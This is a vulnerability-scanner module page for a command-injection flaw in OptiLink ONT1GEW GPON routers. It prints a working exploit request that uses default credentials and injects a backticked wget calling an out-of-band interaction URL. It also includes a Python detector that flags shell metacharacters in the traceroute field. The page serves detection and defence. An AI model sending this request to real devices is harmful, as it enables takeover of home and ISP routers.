OptiLink ONT1GEW GPON Remote Code Execution

By kannthu

Critical
Vidoc Module
#optiLink #rce #oast #mirai #packetstorm
Description

What is "OptiLink ONT1GEW GPON Remote Code Execution"?

The "OptiLink ONT1GEW GPON Remote Code Execution" module is designed to detect a critical vulnerability in OptiLink ONT1GEW GPON devices. This vulnerability allows an authenticated, remote attacker to execute arbitrary code on the affected system.

Impact

If successfully exploited, this vulnerability can lead to complete compromise of the affected system. An attacker can execute arbitrary code, potentially gaining unauthorized access, stealing sensitive information, or causing further damage to the system.

How does the module work?

The module sends a specific HTTP request to the target system, attempting to exploit the vulnerability. The request is designed to execute a command on the system by leveraging the "POST /boaform/admin/formTracert" endpoint. The payload includes a command injection that allows the attacker to execute arbitrary code.

Here is an example of the HTTP request:

POST /boaform/admin/formTracert HTTP/1.1
Host: <Hostname>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Origin:
Referer: /diag_ping_admin_en.asp
User: e8c
Password: e8c

target_addr="1.1.1.1+`wget+http%3A%2F%2F<InteractionURL>%2F`\"&waninf=127.0.0.1"

The module also includes matching conditions to identify if the vulnerability is present. In this case, it checks for the presence of the "http" protocol in the response, indicating successful exploitation.

This module is critical in identifying systems that are vulnerable to the OptiLink ONT1GEW GPON Remote Code Execution vulnerability, allowing organizations to take appropriate measures to mitigate the risk and protect their systems.
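
A defender-side check for the request shape described above, as an added example (not Vidoc's module code and not from the original page): it flags captured POST bodies to /boaform/admin/formTracert whose target_addr is anything other than a bare IP address or hostname. The function names and the benign sample are constructed for illustration, and inspecting only target_addr is an assumption based on where the page's payload sits.

```python
import ipaddress
import re
from urllib.parse import parse_qs

TRACERT_PATH = "/boaform/admin/formTracert"  # endpoint named on this page
# RFC 1123-style hostname; anything else in target_addr is treated as suspicious.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
SHELL_META = set("`$;|&<>(){}\\\"' \t\n")


def is_plain_target(value):
    """True when value is a bare IP address or hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def inspect_request(method, path, body):
    """Return (value, metacharacters) for each suspicious target_addr."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TRACERT_PATH:
        return []
    # parse_qs percent-decodes and maps '+' to space, like a form parser.
    fields = parse_qs(body, keep_blank_values=True)
    return [
        (value, sorted(SHELL_META & set(value)))
        for value in fields.get("target_addr", [])
        if not is_plain_target(value)
    ]


# Constructed samples: a normal traceroute form post, then the body shown on
# this page with its <InteractionURL> placeholder left in place.
BENIGN_BODY = "target_addr=8.8.8.8&waninf=127.0.0.1"
PAGE_BODY = r'target_addr="1.1.1.1+`wget+http%3A%2F%2F<InteractionURL>%2F`\"&waninf=127.0.0.1"'

if __name__ == "__main__":
    for body in (BENIGN_BODY, PAGE_BODY):
        print(inspect_request("POST", TRACERT_PATH, body))
```

The same allow-list test (accept only an IP address or hostname) is also the shape of the server-side validation that would close the injection, so the check works both as a log or proxy detection and as a reference for input handling.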

Module preview

Concurrent Requests (1)
1. HTTP Request template
   Raw request
   Matching conditions: word: http
Passive global matcher: No matching conditions.
On match action: Report vulnerability